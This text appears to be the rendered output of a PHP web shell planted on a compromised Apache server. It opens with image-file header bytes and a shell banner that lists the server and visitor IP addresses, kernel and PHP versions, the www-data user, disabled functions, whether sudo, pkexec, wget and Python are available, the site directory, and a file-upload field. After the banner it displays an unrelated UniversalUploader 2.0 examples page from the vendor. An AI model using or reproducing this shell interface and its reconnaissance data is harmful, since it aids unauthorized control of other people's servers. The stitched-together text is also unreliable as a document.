????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.189.141.66 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/icad.astacus.se/project/universal_old/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- saved from url=(0014)about:internet --> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>UniversalUploader 2.0 Examples</title> <link rel="stylesheet" href="styles.css" /> </head> <body> <a href="http://www.element-it.com" title="Element-IT - Industry leading company in multiple file upload controls and file management solutions since 2002"><img align="absmiddle" src="images/element-it.jpg" width="178" height="66" alt="Element-IT Ltd. main web-site" border="0" /></a> <font style="font-size: 16px;"><strong>UniversalUploader 2.0 examples</strong></font> <p>The following examples shows how UniversalUploader version 2.0. works:<br /> <strong>The examples work correctly only if examples folder is situated on web server!</strong> See how to config and run examples at <a href="Documentation/UniversalUploader_Manual_HTML/install.html">documentation</a>.<a href="Documentation/UniversalUploader_Manual_HTML/phpinstall.html"></a><br /> </p> <p>If you cannot run the examples on your server, you may see the similar ones on <a target="_blank" href="http://demo.element-it.com/Examples/universaluploader/index.html">our website</a><br /> Documentations for UniversalUploader can be found in <strong>Documentation\</strong> folder or you may see their <a target="_blank" href="http://www.element-it.com/OnlineHelpUniversal/index.html">on-line version</a><br /> If you have questions or problems with the code, you may go to <b>Troubleshooting page</b> inside documentation for help.<br /> <br /> In the examples trial version of UniversalUploader is used. It doesn’t have any limitations of functioning but sometimes the message indicating that you are using a trial version appears. You can find possible <a target="_blank" href="http://www.element-it.com/purchase.aspx?product=universaluploader">licenses and prices of UniversalUploader </a>. <br /> </p> <div align="center"> <h2><strong>UniversalUploader examples: </strong></h2> </div> <ul type="square" style="list-style-image: url(images/exe.png)"> <li><a href="singleUploader.html">Single uploader </a> - It shows how UniversalUploader can be configured to display only one upload tab at the same time. UniversalUploader will display first correctly initialzed (supported by user's browser) uploader. We recommend to use following sequence of uploaders as the value for the "uploaders" property: "drag-and-drop, flash, classic". And it used by default. </li> <li> <a href="multipleUploaders.html">Multiple uploaders </a>- The example shows how to display <strong>several uploaders at the same time</strong>. <br /> User can easily switch between tabs and use different uploads with exactly the same interface.</li> <li> <a href="filefilter.html">Upload file filter</a> - This example shows the posibility to set various filters for selected files. You can configure uploader to <strong>filter files by size, type, total count, total size, etc </strong>. </li> <li> <a href="chunkupload.html">Chunk Upload</a> - This is an example of <b>file upload by chunks</b>. It allow upload really large files, avoid server side limitations on maximum file (request). </li> <li><a href="uploadwithform.html">Upload with Form</a> - The example shows the <strong>transferring form values</strong> (<Form... <input..) and custom data together with uploaded files. The values transferred by POST method. </li> Also you can translate some of messages on the page. </li> <li><a href="integrateInForm.html">Integrate in form </a> - The example shows how to integrate file upload functionality into existing form. </li> <li><a href="amazons3.html">Upload to Amazon S3 </a> - The example demonstrates direct upload to<strong> Amazon S3</strong> servers feature. <li><a href="folderupload.html">Folders upload </a> - The example demonstrates possibility to<strong> upload folders</strong> and restore directory structure on server side. <br /> <h3>Resize images:</h3> <ul type="square" style="list-style-image: url(images/exe.png)"> <li><a href="resizeimages.html">Resize images </a> - This example shows the possibility of <strong>image upload and different manipulations</strong> with images. A user can see image thumbnails and rotate them. Images will be resized on client side before upload to server.</li> <li><a href="resizeimagesMultiple.html">Several thumbnails for each image </a> - This example shows how to configure uploader to upload <strong>several different thumbnails</strong> (resized image copy) for each image file. </li> </ul> <h3>UI customization:</h3> <ul type="square" style="list-style-image: url(images/exe.png)"> <li><a href="customui.html">Custom UI </a>- The example shows how to <strong>integrate uploader into your web site</strong> UI. You can use any html element as "browse" button. </li> <li><a href="onlybrowsebutton.html">Only browse button </a>- The example shows how to <strong> customize UI</strong> and to use minimum of UI elements. </li> <li><a href="compactcolorbox.html">Display in javascript window view</a> - This example shows how to <strong>display interface in a java script window (not pop-up!)</strong>. It uses a free JQuery and Colorbox libraries. With such sample you can <strong>always find needed space at your page</strong> for uploader!</li> <li> <a href="simpleuploadwithresize.html">Resize interface at runtime </a> - Shows how universal uploader can be resized dinamically using JavaScript.</li> <li> <a href="flashInterface.html">Own UI for Flash/Silverlight uploaders </a> - Shows how to display own UI for Flash/Silverlight uploaders. It provides more functionality . Like sorting, file information, images preview, etc. </li> <li><a href="localization.html">Localization at the page</a> - Example demonstrates how to use <strong> file (.js) with messages and labels translated</strong> to other language.<br /> </ul> </li> </ul> <br /><hr> Visit <a href="http://www.element-it.com/multiple-file-upload/universal-uploader.aspx">UniversalUploader</a> web site for new release and support information. <br /> Copyright © 2002-2013 <a href="http://www.element-it.com">Element-IT Ltd.</a> All rights reserved. <br /> <br /> </body> </html>